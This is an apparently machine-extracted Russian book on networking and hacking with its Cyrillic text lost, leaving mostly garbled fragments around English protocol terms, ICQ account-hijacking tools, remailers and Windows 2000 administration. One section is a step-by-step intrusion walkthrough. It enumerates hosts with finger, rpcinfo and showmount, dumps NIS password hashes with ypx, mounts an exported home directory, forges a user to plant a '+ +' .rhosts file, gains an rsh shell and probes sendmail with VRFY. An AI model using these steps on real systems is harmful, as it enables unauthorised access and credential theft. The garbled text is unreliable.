. sometihg.com e-mail , . , e-mail 777777'. , : e-mail . (: email , web ), web-. [email protected]? , ( e-mail ) [email protected]. . , : , . . , , ^! . , ... 80% , , . . UIN , e-mail .

, , ICQ 8 . Windows UIN . Linux, , , password, ( , root ).

138

Linux ICQ - , UIN 9, . ? UINa. Linux ICQ , . ICQ , ...

... ... ...: - ICQ e-mail? : , ICQ ICQhijeck. IP , UINa ICQhijeck spoofed , , . . , . : , . ICQ? : . , , ICQsniff , ICQ . , , , . . , , , , , , , . : ICQhijeck, ICQsniff, keyboard sniffer, /UDP snifter - , - ? : Private Bug, . , , ICQ, .

139

tools ? , , . . . , , , www.yahoo.com. .

, ... , UINoM , ICQ. , , - , ICQ . , 1CQ , Windows. , www.icq.com ICQ, . , . . web- . free emeil, free webhosting . , - e-mail, . , , , e-mail ICQ . , , . . Internet , , , . , ICQ , . , ICQ ? , ...

140

OSI . 1980 . (ISO) , . (OSI), 1984 . OSI . , ( ), , , , OSI. , , , .

OSI , , . , , , . . . . OSI ; , , . OSI , (, ) (, ) , . , , , 141

, , .

OSI . . . , , . , , , , , . , . ( )? . , , , -. , , . , X , .

OSI , , .

OSI. , OSI; , OSI. , , . , , . , .

142

' , , , . . , , . ( ), .

, , . ( ). . () , , .

. , , . , . , , . , , , ( ).

143

, , , . ( ). , , , . . .

( - ) . , ( ), , ( ), , .

, , . , , , , , .

. , , . , AppleTalk TCP/IP, OSI. . ( ), , . (LAN)144

; , , . , . , , . , , . , , , , , , , , , . , , . . , , . , . , , , . (, , - ); , (, AppleTalk).

, , , . , , , , a, PDU, , , , . , (frame) , 145

. (packet) , . , (message) , . , , .

. , , . , , , . , . , ; , .

: ( ) . , . . .

(, , ) . . , , . .

146

. / , , . . ( ) . . . , , . , , . . . , , .

. . , - , ( MAC), ( ) . , , . ( , ) , , . . . , , , , , . , , , .

147

. (ISO) , . , , , , (ES), , , (IS). , ( IS), , , ( IS). , , . (AS). , , .

, . -, , . -, , - . , , . :

148

, , . . , . , , . , . . , , . , , , . . , , , . , . , . . . - , , , . , , , . , , .

. , -

149

. , , . , , , . , , , .

. , :

. . , . , , , , . , , , , . . . . , , , . , . 150

, . , ( , ). , , . . ; . . , . . , (backbone ) . , . , . , , (AS), . - , . . . , , . (). , . , .

151

, . . , . , . , . , , . , , . . , , , , . , . .

; , . . , .

( ) . , . ( -) , . , .

152

, , . , , , . , . , .

() , . . , , () . , :

. . , , . , , , ( ).

, , ( /). , . , . 153

. . , .

-

, . , , , , . , .

- . , Ethernet 10 Mbps 64 /. , , , , .

1980 . , , , . . . Ethernet transparent bridging ( ). Token Ring Source-route bridging ( - ). Translational bridging ( ) ( Ethernet Token Ring). Source-route transparent bridging ( -) - , Ethernet/Token Ring. , ,154

. , , , , . 1980 . , , .

(LAN). 4 : , , . (OSI), LAN. , , .

, ( ), , , ( ) . , , , . Ethernet, Token Ring FDDI. . , , , , . (, -) . . (, ) , . . , . , , . Apple Talk, DECnet, TCP/IP, XNS .

155

, . , , ( ) , . , . , , . , . -, , , . -, . -, , LAN, , . -, LAN, .

, . . LAN, . LAN , . . LAN WAN ( ). WAN, LAN WAN. LAN WAN WAN LAN, . WAN, . , - LAN, 3 Mb/, LAN, , /, , 64 Kb/. 156

, . , . IEEE ( ) OSI : MAC ( ) LLC ( ). MAC (, , .), LLC , , MAC. MAC. (, IEEE 802.3 IEEE 802.3). (, IEEE 802.3 IEEE 802.5). , , , , , . , , 50 , .

, , , . , , , , ( ) . , , . , . - . .

157

( , ), .

. (managed devices ), , , , . , , . Management entities ( ) , , , :

, . . . , , , ( ) , (NMSs), . the Simple Network Management Protocol (SPMP) ( ) Common Management Information Protocol (CMIP) ( ). Management proxies ( ) , .

ISO ISO . . 5 : 158

, . , , , . : , .

( ). , , .

. NMS . . , , . . , . , .

, . , , , , .159

, . , : ' Ethernet TCP/IP NetWare NFS .25 SNM

, . , . - , , .

, . . ( ) . , . . . . , , , .

, , ( ) , 160

. , , , ISO. : . . . . .

, , . , , , , . . . , , , () , - . , , ( ). : ( , )

161

.

EthernetEthernet (PARC) Xerox 1970- . Ethernet IEEE. Digital Equipment Corporation, Intel Corporation Xerox Corporation , IEEE. Ethernet IEEE (). Ethernet (carrier sense multiple access/collision detection (CSMA/CD)), Ethernet, IEEE. Ethernet , , , , . Ethernet .

Token Ring IEEE Token Ring IBM 1970 . - IBM (LAN), LAN Ethernet/IEEE. IEEE Token Ring IBM. IEEE Token Ring IBM, . Token Ring Token Ring IBM, IEEE.

Token Ring IEEE Token Ring IEEE , . Token Ring IBM , , (MSAU), IEEE ( IEEE ).

162

, (IEEE , Ring IBM )

Token Ring IEEE . , . . , , , , . . ., , , , , ( ), , , , . , ( early token release), , , . , Token Ring . , , . , , . ; , . , , . CSMA/CD (, Ethernet) . , , , . , , , Token Ring , . .

163

IBM Token Ring MSAU, , . - MSAU MSAU. - MSAU . MSAU .

Token Ring , , , . Token Ring , : . , , , . , ( ), , , . . , , .

Token Ring . , Token Ring (active monitor). , , . . , , , , . . . IBM Token Ring . Token Ring MSAU, , .

164

Token Ring, (beaconing), . , - ( , ), . , , , , (NAUN), , . , (autoreconfiguration), , , , . MSAU .

Token Ring : / .

; : ( / ). , , . , ( / ) ( , , - ). , / . , , .

. ; 165

, . / . , . . , . IEEE 6, . . , , . (FCS). - , . , , . , , . , , / .

FDDI - (FDDI) ANSI X3T9.5 ( ) 1980 . (LAN) ( Ethernet Token Ring). LAN, . , . FDDI , . FDDI, ANSI ISO. ISO FDDI, , ANSI. FDDI , Ethernet Token Ring, FDDI , 166

FDDI. FDDI , , .

FDDI 100 Mb/. LAN , - . , ; OSI , . , FDDI Token Ring. , ( ), ( ), (, -beaconing). FDDI , . , ( , ), ( ) ( , ). FDDI : ( ) . , . , . , , ( ), , , (, ), , . , . , (LED), .

167

FDDI FDDI 4- :Media Access Control (MAC) ( )

, , , , CRC ( ) .Physical Layer Protocol (PHY) ( )

/ , , .Station Management (SMT) ( )

FDDI, , , , , .

FDDI . . . FDDI , - . , . , (SAS) ; , (DAS) . SAS , SAS. , SAS . , PC , . DAS FDDI , . FDDI. , , .

FDDI , . FDDI 168

: . FDDI, 100 Mb/; . , . , . . SMT FDDI FDDI. . . FDDI , .( FDDI , .

FDDI . . , - , , , , , ( ) . FDDI . , , , , . . , . , , , , (dual homing), , . . 169

; . , , ( , ) . , , .

FDDI Token Ring.preamble

.start delimiter

. , . /frame control

, , ( ), .destination address

, Ethernet Token Ring, 6 . (), () ( ) , , .data

, , .frame check sequence

, Token Ring Ethernet, (FCS) (CRC), , -. , . , , .

170

end delimiter

, .frame status

, , .

UltraNet UltraNet, UltraNet, , (Gb/). UltraNet Ultra Network Technologies. UltraNet , , , , . UltraNet (, Ethernet Token Ring) , .

UltraNet , OSI. UltraNet Simple Network Management Protocol (SNMP) ( ) Routing Information Protocol (RIP) ( ). UltraNet (Hub) . UltraNet , , , , . UltraNet . , UltraNet, 30 . (WAN), , .

UltraNet UltraNet , , , , .171

(hub) UltraNet UltraNet UltraNet. (UltraBus), . UltraBus UltraNet. UltraNet , . UltraNet UltraNet : , UltraNet Transmission Control Protocol/Internet Protocol (TCP/IP) ( / Internet) . , UltraNet . , , UNIX Berkeley Standard Distribution (BSD). , , , . , , UltraNet, UltraNet , UltraNet. , UltraNet . Ultra Network Manager ( UltraNet), .

172

UltraNet UltraNet , UltraNet. Intel PC, DOS Windows, UltraNet (NMB). NMB 1 Mg/ LAN, StarLAN (IBaseS). UltraNet , SNMP.

UltraNet UltraNet . , High-Perfomance Parallel Interface (HIPPI) ( ), HSX ( Cray), ( IBM) LSC ( Cray), VMEbus, SBus, HP/EISA bus IBM Micro Channel bus. , UltraNet. , , , . ; FIFO . , . / (I/O) , . UltraNet , UltraNet , . . UltraNet. TCP/IP , OSI, .

173

UltraNet UltraNet Cisco Systems AGS+. , , , 1 /. , . , , .

HSSI . Fiber Distributed Data Interface (FDDI) (- ) 100 Mb/. , , , (- ). , . (WAN) , LAN . WAN, Frame Relay ( ), Switched Multimegabit Data Service (SMDS) ( ), Synchronous Optical Network (Sonet) ( ) Broadband Integrated Services Digital Network (Broadband ISDN, BISDN) ( ), - , WAN , .

174

, , data terminal equipment (DTE)/data circuit-terminating equipment (DCE) ( / ), . DTE/DCE, RS-232 V.35, . , DTE/DCE. High-Speed Serial Interface (HSSI) ( ) DTE/DCE, Cisco Systems T3Plus Networking, . HSSI , HSSI. HSSI .

HSSI , DTE/DCE. , OSI. HSSI 52 Mb/. HSSI (45 Mb/) WAN, Office Channel (OC)-l (52 Mb/) (SDN), , , Token Ring Ethernet. (ECL) HSSI . ECL Cray ; High-Perfomance Parallel Interface (HIPPI), ANSI, LAN . ECL- , , . HSSI ( ). DCE . DCE . , , , -.

175

, (broadband) . HSSI , FCC 50- , , V.35. , , HSSI . HSSI , Small Computer Systems Interface 2 (SCSI-2), HSSI . , HSS1 . , , DTE. DCE. DCE. , DCE DTE DCE. HSSI , DCE DTE . , (DTE available DTE DCE available DCE ). , . , DTE DCE , . , .

80- Internet ( , , ) , TCP/IP. (LAN) , Ethernet. (WAN), (PDN) .25. () ( ). , . , RS-232-C .176

IP Internet. Point-to-Point Protocol () ( ) . Internet IP , , IP, (/) - , , , , , . (Link Control Protocol) (LCP) (Network Control Protocols) (NCP), . , IP, , IPX DECnet.

. : . Highlevel Data Link Control (HDLC) ( ) . LCP , . NCP . .

, , LCP () . , LCP 177

, NCP, . , . , LCP NCP , - (, - ).

, DTE/DCE. , , ( , ), , , . - , , , DTE/ .

, HDLC (ISO 3309-1979) (ISO), ISO 33091984/PDAD1 Addendum l:Start/stop Trasmission ( 1: ). ISO 3309-1979 HLDC . ISO 3309-1984/ PDAD1 ISO 3309-1979 , . , ISO 4335-1979 ISO 43351979/Addendum 1-1979. : flag ; . 01111110.address

1 ; 11111111, 178

. .control

1 00000011, . , LLC 1.protocol

2 ; , . Assigned Numbers Request for Comments (RFC).data

; , . FCS. 1500 . , .frame check sequence

(FCS) 16 ( ). , 32- () FCS, . Link Control Protocol (LCP) . .

(LCP)LCP , , . LCD 4 : . - (, IP), LCP . , .

179

. LCP , . , , . . LCP . . , LCP , NCP, . , LCP , , . . LCP . (), - - , , . . . . . . .

LCP:

LCP.

ISDN Integrated Services Digital Network (ISDN) ( ) , . ISDN , , , , , , 180

. ISDN , , , . ISDN , / . . / , . ISDN . ISDN (, Group IV), , . ISDN. ISDN . (Local-exchange carrier) (LEC) ISDN 1, (WATS) (wide-area telephone service).

ISDN ISDN , (), , . ISDN. ISDN 1 (terminal equipment type 1) (1). , ISDN, , DTE, ISDN, 2 (terminal equipment type 2) (2). 1 ISDN . 2 ISDN . () ISDN , 2. , 2 , . ISDN, 1 2, NT1 NT2. , 181

. NT1 (customer premises equipment) (CPE). NT1 , . NT2 , (), . NT 1/2; , NT1 NT2. ISDN . , , NT1. ISDN R ( ISDN ), S ( NT2), ( NT1 NT2) U ( NT1 ). U , NT1 . ISDN (Basic Rate Interface) (BRI), ISDN, - D- (2B+D). - BRI 64 Kb/; , . BRI , 192 Kb/. ISDN (Primary Rate Interface) (PRI) 23 - D- , 1.544 Mb/ (-D PRI 64 Kb/). PRI ISDN , 30 - 64 Kb/ D- 2.048 Mb/. PRI CCITT 1.431. 1 ( 1) ISDN , ( ) ( ). 48 , 36 .

182

ISDN. . ISDN .

2 2 ISDN Link Access Procedure, D channel ( , D-), LAPD. LAPD (HDLC) , (LAPB). , LAPD D- , . LAPD HDLC; , HDLC, LAPD , . (flag) (control) LAPD HDLC. LAPD . , (), ; , . servise access point identifier (SAPI) ( ), . C/R , . (terminal end-point identifier) (TEI) , . , .

3 ISDN 3: CCITT 1.450 ( CCITT Q.930) CCITT 1.451 ( SSITT Q.931). -, . , , SETUP (), CONNECT (), RELEASE (), USER INFORMATION ( ), CANCEL (), STATUS () DISCONNECT (). , .25.

183

SDLC IBM Synchronous Data-Link Control (SDLC) ( ) 1970 . Systems Network Architecture (SNA) ( ). SDLC , . , (, Bisynk IBM) , (, Digital Data Communications Message Protocol ) , - , . SDLC IBM . (ISO) SDLC HDLC ( ). (CCITT) HDLC (LAP), , (LAPB). (IEEE) HDLC, IEEE 802.2. . SDLC SNA .

, SDLC . () , , , . SDLC : ( ). . , . , .

184

. , . SDLC : Point-to-point (). : . Multipoint (). . Loop (). , . , , . Hub go-ahead ( ). . . . .

SDLC (flag). (address) , . , , . (control) SDLC. SDLC : (Information (I) frames) ( ). (P/F) . (send sequence number) , . (receive sequence number) , -

185

. , . P/F, , . , , . (Supervisory (S) frames)

. . , I. (Unnumbered (U) frames)

, . . U . , - , . (frame check sequence) (FCS) . FCS (cyclic redundency check) (CRC). CRC . , , , , . , SDLC, IBM ( ) Token Ring. IBM ( ) (FEP), Token Ring SNA. , SDLC, 56-/ .

, HDLC , SDLC, SDLC, . LAP HDLC, LAPB , HDLC. IEEE 802.2 HDLC LAN.

186

HDLC HDLC , SDLC; HDLC , SDLC. , , SDLC, HDLC . HDLC SDLC. -, HDLC 32- . -, SDLC, HDLC loop hub go-ahead. HDLC SDLC , SDLC , HDLC . HDLC : (NRM)

SDLC . , . (ARM)

. ()

, , , . . - . LAPB LAPB , .25. , LAPB , SDLC HDLC. , LAPB , . , LAPB (DTE), (DCE). , , , . , LAPB P/F .

187

IEEE802.2 IEEE 802.2 Logical Link Control (LLC) ( ). LAN, , IEEE 802.3, IEEE 802.4 IEEE 802.5. IEEE 802.2 . 1 . 2 . 3 . , 1 LLC . , Transmissm Control Protocol/ Internet Protocol (TCP/IP), , , 1 . 2 LLC ( LLC2) , , . LLC2 ; IBM. , 3 LLC . LLC, 3 LLC , , ( ) . LLC. 1 1. II 1, 2. III 1 3, IV . IEEE 802.2 (SAP). IEEE 802.2 (DSAP), . , , IEEE 802.2 , , DSAP, . DSAP NAME"; bgcolor=RED> DIR"; "[email protected]. , : 'Internet MSN MSN. , ! , : C:\Program Files\The Microsoft Network\0nlstmt.exe . , , . , . , , . , . MSN , MS Exchange . , ... , , MSN Classic, ... , , Microsoft MSN Classic ( Microsoft MSN Premier). , . MSN, . , , . MSN Premier MSN Classic :[email protected]. com

, , MSN Premier. , , SprintNet.

411

Internet , , , . . ( ), : @D ( Enter) TERMINAL^ Dl @ 0311083501402 F7 https://signup.msn.com, ( MSN Classic). MSN Classic . , . E-mail : [email protected].

SprintNet SprintNet , . Sprint Telenet . UTI GTE. US Sprint , Sprint. Sprint 6000 host- (gates) , - . Sprint.

.25 , .25 . .25 , (NUA).

412

Internet, , (-, , Telemate).

SprintNet 928-6344, 928-0985, 342-8376, 913-7166 ()

578-9119,578-9161

Microsoft Internet Explorer - Internet - . - -, . , Microsoft Internet Explorer -, , Internet. , . , . , Microsoft Internet Explorer . , Microsoft Internet Explorer , Internet . . - . , Microsoft Internet Explorer , . , -. -. - Internet , . :

413

InternetHTTP (HyperText Transfer Protocol) FTP (File Transfer Protocol) Gopher Security (Secure Sockets Layer protocol) WAIS (Wide Area Information System) SOCKS () - . , - : HTTP, FTP Gopher. - IP- -. , . -, HTTP FTP. , Internet . , HTTP 80- , a FTP 21-. , . , - bob.leon.com abob,bbob,leon.com, HTTP abob, bbob leon.com , , -. . , Internet Explorer. , Internet Explorer, .

Microsoft Internet Explorer Windows Microsoft Internet Explorer. Microsoft Internet Explorer , , , , . , , . , . , Microsoft Internet Explo-

414

Internetrer , . Microsoft Internet Explorer , . . , Microsoft Internet Explorer . , rlogin Microsoft Internet Explorer.

Windows , HKEY_LOCAL_MACHINE SOFTWARE MICROSOFT WINDOWS. REGISTERED OWNER REGISTERED ORGINIZATION .

Windows , , . ( Allow caller access). . , , : \\\

HyperTerminal Windows HyperTerminal. . .

415

Internet ATSO=N (N ), . .

Windows , , .PWL Windows, .

IP Windows IP , HKEY_LOCAL_MACHINE System CurrentControlSet Services VxD MSTCP .REG. IP, . , IP .

IP Windows IP , TCP/IP .

web- Internet, , , web-. . , , , . , web web-. , web- , , web-. , web-. , . Web- HTML! 416

Internet

, , . web- WWW .

Domain Name Server Internet . DNS . DNS- 32- IP, . DNS DNS Domain Name Server DNS. IP- DNS- IP- . DNS , IP- DNS. . DNS , , , , root.cache. , Internet.

Wingrab WinGrab , Windows. Windows , . Internet FTP-. WinGrab , (, Subject: ). @. WinGrab - . , , . , 10 35 . , System.

417

Internet System, , , .

remailer remailer Internet, Usenet. remailer. anon.penet.fi, cypherpunk. Remailer anon.penet.fi , 160,000 , . . Cypherpunks mailer, , , . anon.penet.fi- ID. , -, ID ( , Usenet ), [email protected]. , penet ID (- an!23456 anon.penet. fi). !23456 , : 1. anon.penet.fi, - Espoo . 2. anon.penet.fi . penet email- , . . 3. penet email-. 4. , , email- . ( , Usenet ), . anon.penet.fi ID email-, cypherpunks remailers . , email email- Usenet .418

Internet remailer: 1. , public key remailer'a. 2. email remailer'a. 3. remailer , private key, (plaintext). 4. ..

5. , email- -

remailer'a, . , cypherpunks remailer . , , , remailer'oB. remailer.'bi , . remailer'oB, , , . , . premail. , , remailer'e , . remailer , remailer'a. . , (plaintext) . Remailer'bi . , , , , . , cypherpunk remailer'oB , . , , , . , alias- . , alias, email- (, [email protected]). , , . , email-, 419

Internet . , , (nickname) alias-, . alias- , .net.fi, , remailer'oB. , (remailer) , email-. , , email, . , , . , remailer'bi . , remailer'oB: , . remailer'oB . remailer'oB, : .

remailer'oB remailer anon. penet.fi, ( Johan Helsingus). ID, [email protected]. anon.penet.fi , . , . , , e-maii'e (), "--"; , , . :[email protected]

, anon.penet.fi: [email protected] Usenet, alt.security, ( ):[email protected]

, ID (, ). ID.

420

Internet , ( ). , pass\[email protected]; , :: [email protected] Subject: TNO_rUlEz

:[email protected]. fi

Usenet Usenet . , . , , , - ( , ). , , , , , ID.

421

Windows 2000!

Windows 2000! . . , - , . . , . ... , , , . . . ( ). , , , . . . ? , : finger, rusers, showmount, rpcinfo, dns, ftp, sendmail... . . ? allias, nameserver , . nslookup. 1. finger rusers devil finger @www.xxx.xxxx.su [www.xxx.xxxx.su] Login Name TTY Idle kuzmenko Vladimir Kizmenko pO 4:57 kuzmenko Vladimir Kizmenko p1 2:38 milichen Yuri Mulichenko p4 4:59 sherbak Eugeny Scherbkov p5 5:00422

When Office Sun 08:25 Sun 08:26 Fri 19:41 /410 1-35-13 Sat 10:18 221/448 1-77-33

Windows 2000! devil finger [email protected] [ccsix.xxxx.xxxx. ru] Login: yur Name: Yuri A. Podgorodsky Directory: /home/yur Shell: /bin/bash On since Sat Apr 12 12:24 (MSK) on ttypO from jannet.xxxx.xxxx 3 hours 35 minutes idle Mail forwarded to [email protected] No mail. No Plan. devil rusers -1 unisun.xxxxx-xxx.net Login Name TTY When Host lavrov unisun.xxxxx-xxx:console Apr 2 10:32 sun unisun.xxxxx-xxx:ttypO Apr 5 10:20 (mskws.desy.de) lavrov unisun.xxxxx-xxx:ttypl Apr 2 11:21 lavrov unisun.xxxxx-xxx :ttyp2

Idle 17:37 17:32 25:55

Apr 2 10:33 97:11

, , shell , . Idle, , . 2. rpcinfo devil rpcinfo sunlO.xxx, XXX. su address program version netid 0.0. 0. 0. 0. 111 tcp 100000 2 udp 0.0. 0. 0. 0. 111 100000 2 0.0. 0. 0. 2. 150 udp 100004 2 tcp 0.0. 0. 0. 2. 151 2 100004 0.0. 0. 0. 2. 150 udp 100004 1 0.0. 0. 0. 2. 151 1 tcp 100004 0.0. 0. 0. 2. 152 1 udp 100069 0.0. 0. 0. 2. 154 tcp 1 100069 0.0. 0. 0. 4. 0 tcp 100007 2 0.0. 0. 0. 4. 3 udp 100007 2 0.0. 0. 0. 4. 0 1 tcp 100007 1 0.0. 0. 0. 4. 3 udp 100007 0.0. 0. 0. 2. 156 1 tcp 100028 0.0. 0. 0. 2. 158 udp 1 100028 0.0. 0. 0. 3. 255 1 udp 100009

service rpcbind rpcbind ypserv ypserv ypserv ypserv

owner unknown unknown unknown unknown unknown unknown unknown unknown unknown ypbind unknown ypbind unknown ypbind unknown ypbind ypupdated unknown ypupdated unknown yppasswdd unknown

423

Windows 2000! keyserv unknown udp 0.0.0.0.2.159 1 100029 unknown nfs udp 0.0.0.0.8.1 100003 2 raountd unknown 0.0.0.0.2.223 1 udp 100005 unknown 0.0.0.0.2.223 mountd udp 100005 2 mountd unknown 0.0.0.0.2.226 top 1 100005 unknown 0.0.0.0.2.226 mountd top 100005 2 unknown 0.0.0.0.2.226 status 1 100024 udp 0.0.0.0.2.228 status unknown 100024 1 top 1 0.0.0.0.2.229 nlockmgr unknown top 100021 rpcinfo RPC . mountd, nisd, ypserv ypbind, statd, bootparam, pcnfsd, rexd. statd , pcnfsd mountd , rexd .3. NIS (nisd, ypbind, ypserv)

NIS , NIS NIS . : devil ypx -dg sun10.xxx.xxx.su Trying domain sun10.xxx.xxx.su Trying domain sunIO Trying domain xxx.xxx.su sysdiag:*:0:1:0ld System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/ sundiag/sundiag Sybase:*:13:55:syb:/usr/nms/sybase:/bin/csh nobody:*:65534:65534::/: daemon:*:1:1::/: audit:*:9:9::/etc/security/audit:/bin/csh uucp:*:4:8::/var/spool/uucppublic: sync:__F324VMRDcL6:1:1::/:/bin/sync root: Ye.Ibw.8uQg:0:3:Ope rato r:/:/bin/csh news:*:6:6::/var/spool/news:/bin/csh sys:*:2:2::/:/bin/csh snm: 7ck.pfEh/2s:11:11:Network Manager:/usr/snm:/bin/csh rom: IriAsoksSeE:10:10:Victor Romanchik:/usr/rom:/bin/csh nms:*:12:55:Network Manager:/usr/nms:/bin/csh bin:*:3:3::/bin: YP map transfer successful!. .

424

Windows 2000! NIS , bootparam /var/yp, .4. showmount

devil showmount -e thsun1.xxxx.xxxxx.su export list for thsun1.xxxx.xxxxx.su: (everyone) /pub thsun2,thsun3,tlx39 /opt (everyone) /pgm/linux (everyone) /export (everyone) /usr (everyone) /tftpboot (everyone) /cd rom/sol_2_3_hw894_spa rc/sO (everyone) /home (everyone) /scratch/users showmount , , . export, home, usr ! ... devil* mount -F nfs thsun1.xxxx.xxxxx.su:/home /mnt devil cd /mnt devil Is -al total 12524 1024 Jun 28 1996 . root drwxr-xr-x 17 root 1024 Apr 12 16:29 .. root drwxr-xr-x 28 root 512 May 19 1995 TT_DB 2 root root drwxr-xr-x 512 Nov 25 1994 cfi 798 3 root drwxr-xr-x 512 Nov 25 1994 dug 100 6 root drwxr-xr-x 512 Feb 17 11:19 Icta other 9 root drwxr-xr-x 512 Jun 19 1996 Ihep other 3 root drwxr-xr-x 512 Feb 14 11:16 Inp other 6 root drwxr-xr-x 512 Feb 14 11:19 Inup other 6 root drwxr-xr-x 512 Jan 15 1995 Inur other drwxr-xr-x 4 root devil cd Inup devil Is -al total 12 512 Feb 14 11:19 . 6 root other drwxr-xr-x 1024 Jun 28 1996 .. 17 root root drwxr-xr-x 512 Oct 30 1995 dolbilov 3 6000 600 drwxr-xr-x 1024 Oct 7 1996 davgun 9 6190 600 drwxr-xr-x 512 Oct 20 1995 gvf 4 6001 600 drwxr-xr-x 512 Apr 4 10:31 yup 4 6003 600 drwxr-xr-x devil echo 'dolbilov::600:' /etc/groups devil echo 'dolbilov:x:6000:600::/noway:/bin/csh' /etc/passwd devil su dolbilov

425

Windows 2000!$ cd dolbilov $ Is -al total 30 512 Apr 12 16:21 . drwxr-xr-x dolbilov dolbilov other drwxr-xr-x ( root 512 Feb 14 11:19 dolbilov dolbilov 2901 Apr 7 1993 , cshrc -rw-r~r 1550 Apr 7 1993 .login 1 dolbilov dolbilov -rw-rr-2750 Apr 7 1993 .rootmenu 1 dolbilov dolbilov -rw-r--478 Apr 7 1993 .sunview 1 dolbilov dolbilov -rw-r--r dolbilov dolbilov 2196 Oct 30 1995 mbox -rw 512 Nov 25 1994 timezone dolbilov dolbilov drwxr-xr-x $ echo ' + +' .rhosts $ exit devil rsh -1 dolbilov thsun1.xxxx.xxxxx.su /bin/csh -i $ shell . 5. sendmaildevil telnet www.xxx.ru 25 Trying 193.124. xxx. xx...

Connected to www.xxx.ru. Escape character is ']. "' 220 www.xxx.ru ESMTP Sendmail 8.8.5/8.8.5; Sat, 12 Apr 1997 15:55:36 +0400

vrfy serg

550 serg... User unknown vrfy alex250 Alexei E. Katov , IP . : NBScan, Open Computer. , , , Share. Share Name \\ \ , , Mount. , . NetTool (, Essential) , , ( , NBScan , ).

Windows 2000 . , , (). (account) Windows 2000 , . , , , , , , . Windows NT User Manager ( ). Windows 2000 Windows Users and Passwords ( ).

430

Windows 2000! Users and Passwords ( ) ( Administrators) : , , ; ; ; ; ; ; , .

Users and Passwords ( ). Users of this computer: ( ) Windows 2000. : User Name ( ); Group ().

User Name ( ) , Windows 2000. . Windows 2000 , . Windows 2000 (Administrator) , , .. , . , , . , Windows 2000. (Guests) . , . ,

431

Windows 2000! (Guests) . Group () Users and Passwords ( ) , . Windows 2000 . Windows 2000 Professional Windows 2000 Server. Administrators . Account Operators . Backup Operators , . Guests . , , , . Print Operators . Power Users , , , , . Replicators , . (Directory Replication Service Active Directory). Server Operators , 432

Windows 2000! , .

Users . , . , , .

Windows 2000 Professional Windows 2000 Server Account Operators, Print Operators Server Operators Windows 2000 Server. Windows 2000 Professional. Set Password ( ) . Remove () , Properties () .

, Users and Passwords ( ), Add (). Add New User. User name () , . Full name ( ) , , . , . , Next (), Add New User. Password () Confirm Password ( ) .

433

Windows 2000! Next (). . , , : Standard user ( ) , Power Users. , , , , , . Restricted user ( ) , Users Group. , . , , , . Custom ( ) , Windows 2000 . , Next ().

Advanced () Users and Passwords ( ) . Secure Boot Settings ( ), Ctrl-Alt-Del. , Require users to press Ctrl-Alt-Del before logging on ( Ctrl-Alt-Del ). Microsoft, , . Certificate Management ( ) New Certificate ( ). 434

Windows 2000! Internet Explorer 4.0 Windows , (Public Key). Windows 2000 Professional , . Windows 2000 Server , PKI (Public Key Infrastructure), , , (Public Key). Certificate () Certificate Manager ( ). , . Advanced User Management ( ) Advanced (). Microsoft Management Console (MMC) Local User Manager ( ). User Manager ( ), Windows NT 4.0/3.51. Local User Manager ( ) . , . , : Set Password ; Delete . Windows 2000 , , , , , . Administrator () Guest () ; Rename , ; Properties .

General () , : User must change password at next logon ( 435

Windows 2000! ) . , . User cannot change password ( ) , . Password never expired ( ) , . Account disable ( ) . Account locked out ( ) .

Membership () , Windows 2000 . , Add (). Profile (). , Windows 2000 , , . : Windows Explorer; () Start () Programs (); (taskbar); ; , , , , Plus!, ;

, ( Windows 2000, , , Windows 95

436

Windows 2000! Windows NT, ). Windows 2000 , Ntuser.dat . , Windows 2000 , . , , . , (roaming profile). ( , ), , . , Profile () Profile path: () : \\\_\_ _ . Logon script ( ) , . , CMD . , \system32\repl\import\ scripts, Windows 2000 ( C:\Winnt). , . , ( , ). , , . , . , Local Path ( ). , Connect (), , .

437

Windows 2000!

Show/Hide Console Tree (/ ) . Local User Management, Groups (). , Create Group ( ). Create Group ( ) Name () Descriptions ().

Windows 2000 , ( Administrative Tools () Start () Programs () Administrative Tools (). Start () Programs () , , . , Administrative Tools (), Microsoft Management Console. , , , .. Administrative Tools (), , Microsoft Management Console.

, (snap-ins). , . , . , . .

438

Windows 2000! , . , . , . , Action () Send Console Message ( ). Message () , Recipient () . , . , Administrative Tools (), , Add/Remove Snap-ins (/ ). , Add/Remove Snap-in (/ ). , Add () Remove (), . Add () Add Standalone Snap-in ( ), Available Standalone Snap-ins ( ) , .

Computer Management ( ), Administrative Tools () Start () Programs () Administrative Tools (). , Computer Management ( ) . , : System Tools ( ) , .

439

Windows 2000! Local User and Group ( ). . Windows Users and Passwords ( ); System Information ( ) ).

Services () System Tools ( ) , , . , Windows 2000, , . Services (), Windows NT. , , : (Stop), (Start), (Pause), (Restart), (Resume) . , , . General () Startup (), , . Automatic () . ( Start ()) Manual (). , Disable (). Log On ( ) , . (System account), , (Log On As a service). . , .

440

Windows 2000! , . , . , . Recovery () , . , , - . . , : Restart the Service ( ), Run a File ( ) Reboot the Computer ( ). Run the following file: ( ) . , , , , . }' (Append 'Fail Count' to end of command line). , , .

Group Policy ( ) System Tools ( ) . Group Policy , Windows 2000. Group Policy , , Start (), Windows. , , , Active Directory. , User Right Assignment ( ) .

441

Windows 2000! . Computer Configuration ( ) User Configuration ( ). . Windows 2000 (Administrative Templates), Windows 2000. (Administrative Templates) Group Policy, Computer Configuration ( ), Us